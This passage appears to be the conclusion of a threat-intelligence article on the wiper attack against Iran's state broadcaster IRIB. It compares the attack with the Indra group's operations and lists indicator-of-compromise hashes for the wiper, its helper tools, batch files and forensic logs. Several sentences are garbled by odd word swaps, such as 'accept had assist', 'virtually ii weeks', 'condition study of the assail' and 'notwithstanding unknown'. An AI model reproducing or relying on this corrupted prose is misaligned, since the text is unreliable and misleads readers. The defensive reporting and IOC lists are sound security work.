In this article, we analyzed a set of tools that was likely used in a cyberattack against the IRIB, which disrupted several state-run TV and radio channels. The use of wiper malware in an attack against a state entity in Iran begs us to compare the tools with those belonging to Indra, who, among other attacks, is responsible for unleashing a wiper in the Iranian Railways and Ministry of Roads systems. Although these wipers are coded and behave very differently, some implementation details, such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra's case), suggest that the attackers behind the IRIB hack may have been inspired by previous attacks that happened in Iran.
As in the case of Indra, it appears that the actor may have many capabilities that have yet to be explored. On the one hand, the attackers managed to pull off a complicated operation to bypass security systems and network segmentation, penetrate the broadcaster's networks, and produce and run malicious tools that heavily rely on internal knowledge of the broadcasting software used by the victims, all while staying under the radar during the reconnaissance and initial intrusion stages.
On the other hand, the attackers' tools are of relatively low quality and composure, and are launched by clumsy and sometimes buggy 3-line batch scripts. This might back up the theory that the attackers might accept had assist from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills.
Meanwhile, virtually ii weeks after the assault happened, MEK-affiliated news published a condition study of the assail claiming that the "regime's radio and TV networks have not returned to a normal status" and provided an elaborate list of affected devices with the argument "more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, and their software has been damaged." In that location is no way for the states to verify these claims, but if at least some of them are true, the extent of devastation acquired by the wiper and other malicious tools that we've discovered (and those that are notwithstanding unknown), exceeded expectations.
IOCs
Attack files:
| hash | name | description |
| 1607f31ac66dfec739dc675ade921582acb8446c2ac7d6d1bc65a3e993fc5b54 | msdskint.exe | Wiper |
| 42ed646eed4f949c456c637a222e7d94dd8ac67ed5ebda5e63c7b7979076d9cf | msdskint.exe | Wiper |
| 8bdf6e262966a59a7242d279e511dd694467f07d1d76c456a0c26d0db2ec48a8 | HttpService2.exe | HttpService |
| 427c105859c3dc62ece790e41a42b0f6ae587496a07d3bd190143179cdf6c6bd | HttpService4.exe | HttpService |
| e3d61cbbfbe41295dd52acff388d1d8b1d414a143d77def4221fd885aae6cd83 | HttpService2.exe | HttpService |
| 096bae94e09059e2e3106503353b1b4f7116fa667600ca2ab3fa7591708e645a | HttpService4.exe | HttpService |
| 13a016b8f502c81e172c09114f25e4d8a8632768aefd56c5f6d147e9b6466216 | HttpService4.exe | HttpService |
| ea740894227ae1df923997edb7bda3a00f523fbff7cc02d3b5e6b3de19d672fc | HttpCallbackService.exe | HttpCallbackService |
| 62b692be251feb63af2723a68975976b749cab20014ffaa6488af80f4f03e0a1 | dwDrvInst.exe | ServerLaunch |
| 41e0c19cd6a66b4c48cc693fd4be96733bc8ccbe91f7d92031d08ed7ff69759a | precg2.exe | Winscreeny |
| e9e4a8650094e4de6e5d748f7bc6f605c23090d076338f437a9a70ced4a9382d | mslicval.exe | Winscreeny |
| d788ebc7ee98c222f46d7ca2347027643784a78b5954c9a31734ec1b197bc2aa | Avar.exe | Avar |
| 1155dd06e0b108bde3addcdbd5d1da4dc18ca245c39ce7d967f8971eb0f88dbb | SimplePlayout.exe | SimplePlayout |
| a25215c9adce51a3ecfe34c802d3e7d865cf410ddbe10101e3b41f6ba11347a4 | TSE_90E11.mp4 | MP4 video file |
| 4cc21810d786dca94e01d0714d37e3f097ff6e3813bf6e17a9bd86cd9a4ceb2b | TSE_90E11.001 | WAV file |
| 7ea7b20b87ded3c297ec0890ee8a396427d70caf983b42f479d8fad38629b684 | playoutabcpxtveni.bat | |
| bc8de80a28c8ae55415ccdfece270f6548f067fc2a00e799baf0279d4d560807 | breakusufjkjdil.bat | |
| 197f13580ec249fa84b1e54f978c5cab60f22561a2fab2ff60bdb2d5bfa25512 | avapweiguyyyw.bat | |
| efc8f12c53d1730fa8ac00cfa60e63ab43d90f42879ef69d7f6fb9978246f9cb | playjfalcfgcdq.bat | |
| a2d493c2cb25fc03f5d31cf3023b473d71d38b972eccdb7873f50d2344ea7753 | simpleplayout.ini | |
| c305b3cb96a34258a3e702526de6548b2de99449c0839a9aea518accc7c861ab | 436748-HttpService4.exe.ini | |
| 8b74c08c33cd8a0cc1eaf822caeaad6b54bc39e4839e575f3c0ece4bb8992408 | 436751-HttpService4_2.exe.ini | |
Forensics artifacts:
| hash | name | description |
| 0daa0aefdc6d0641eb06e62bc8c92a0696aa8089258cb2d3552ac137d53237ec | sec.evtx | security event log from one of the machines |
| a3b9bd57e6b281610e570be87883d907992bdf7be3bcd37885ee2cf97d930cd3 | application.evtx | application event log from one of the machines |
| 067ae6ecfd108a79a32eb1a76a262868d8f3a9a7924b26091f0e2229152bdd9d | lastfile2 | path to the last file wiped and deleted by the wiper |
Source: https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/